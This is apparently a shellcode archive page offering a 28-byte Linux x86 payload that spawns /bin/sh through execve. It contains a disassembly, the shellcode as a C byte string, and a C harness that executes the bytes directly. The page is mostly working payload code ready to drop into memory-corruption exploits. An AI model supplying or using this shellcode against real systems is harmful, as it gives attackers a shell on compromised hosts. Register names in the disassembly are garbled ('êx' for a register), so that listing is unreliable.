Linux/x86 - execve(/bin/sh) Shellcode (28 bytes)

2009-01-01 19:05:14

/*
Title: Linux x86 execve("/bin/sh") - 28 bytes
Author: Jean Pascal Pereira <[email protected]>
Web: http://0xffe4.org


Disassembly of section .text:

08048060 <_start>:
8048060: 31 c0 xor êx,êx
8048062: 50 push êx
8048063: 68 2f 2f 73 68 push $0x68732f2f
8048068: 68 2f 62 69 6e push $0x6e69622f
804806d: 89 e3 mov %esp,ëx
804806f: 89 c1 mov êx,ìx
8048071: 89 c2 mov êx,íx
8048073: b0 0b mov $0xb,%al
8048075: cd 80 int $0x80
8048077: 31 c0 xor êx,êx
8048079: 40 inc êx
804807a: cd 80 int $0x80



*/

#include <stdio.h>

char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x89\xc1\x89\xc2\xb0\x0b"
"\xcd\x80\x31\xc0\x40\xcd\x80";

int main()
{
fprintf(stdout,"Lenght: %d\n",strlen(shellcode));
(*(void (*)()) shellcode)();
}

Fixes

No fixes

In order to submit a new fix you need to be registered.